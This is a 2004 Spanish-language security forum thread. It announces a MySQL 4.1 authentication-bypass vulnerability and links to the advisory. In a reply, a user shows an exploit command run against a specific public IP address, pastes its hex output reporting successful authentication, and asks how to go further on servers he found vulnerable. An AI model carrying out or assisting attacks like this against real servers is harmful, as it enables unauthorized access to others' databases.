elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
20 Marzo 2010, 03:34  


Temas destacados: Grupo de Facebook de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: Anon, berz3k)
| | |-+  Vulnerabilidad en MySQL que permite autenticarse sin conocer el pasword 		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Vulnerabilidad en MySQL que permite autenticarse sin conocer el pasword  (Leído 3120 veces)
el-brujo
Adm
*****
Desconectado Desconectado

Mensajes: 15.267


La libertad no se suplica, se conquista


Ver Perfil WWW
Vulnerabilidad en MySQL que permite autenticarse sin conocer el pasword
« en: 08 Julio 2004, 05:02 »
La gente de NSG ha descubierto un fallo en MySQL que permite saltarse el mecanismo de autenticación.

El mismo método puede ser utilizado también para causar un oberflow y dejar fuera de servicio el MySQL.

Se ven afectadas las verisiones 4.1 y anteriores.

Al anuncio oficial lo puedes encontrar en:

http://www.nextgenss.com/advisories/mysql-authbypass.txt

Además han publicado un pdf muy interesante en el que profundizan en este y otros temas relacionados con los ataques SQL.
http://www.nextgenss.com/papers/HackproofingMySQL.pdf

Fuente:
http://www.cyruxnet.com.ar/news.htm


No queda muy claro, pero creo que la rama 4.0.x (la estable y recomendada) no tiene este problema.

Tampoco lo tiene la rama 3.23.x, que ya "casi" no se utiliza.
« Última modificación: 08 Julio 2004, 08:41 por el-brujo » En línea
Give peace a chance
"elhacker.net es único, por eso no fabrica para otras marcas"
jank0

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Vulnerabilidad en MySQL que permite autenticarse sin conocer el pasword
« Respuesta #1 en: 02 Agosto 2004, 14:51 »
A ver si me puedes dar una mano en esto...
tengo el dicho exploit para esa vulnerabilidad... pero en realidad no se que es lo que hace :S he encontrado servers vulnerables y solo me sale el "authentication successful" y de ahi no pasa ...
ej:

$ perl mysql.pl mysql 210.66.38.10 3306
Received greeting:
00000000        48 00 00 00 FF 6A 04 48 6F 73 74 20 27 32 30 30
00000010        2E 31 37 38 2E 32 35 34 2E 31 33 30 27 20 69 73
00000020        20 6E 6F 74 20 61 6C 6C 6F 77 65 64 20 74 6F 20
00000030        63 6F 6E 6E 65 63 74 20 74 6F 20 74 68 69 73 20
00000040        4D 79 53 51 4C 20 73 65 72 76 65 72

Sending caps packet:
00000000        3B 00 00 01 85 A6 03 00 00 00 00 01 08 00 00 00
00000010        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000020        00 00 00 00 6D 79 73 71 6C 00 14 00 00 00 00 00
00000030        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Received reply:
00000000
Received OK reply, authentication successful!!
$
pero devuelve a mi prompt no al del server :S
Gracias...
En línea
Páginas: [1] Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Yashira.org    Videojuegos    indetectables.net    Seguridad Informatica Colombia    Indejuegos    Internet móvil

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec    Seguridad Wireless    Underground México    Biblioteca de Seguridad

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC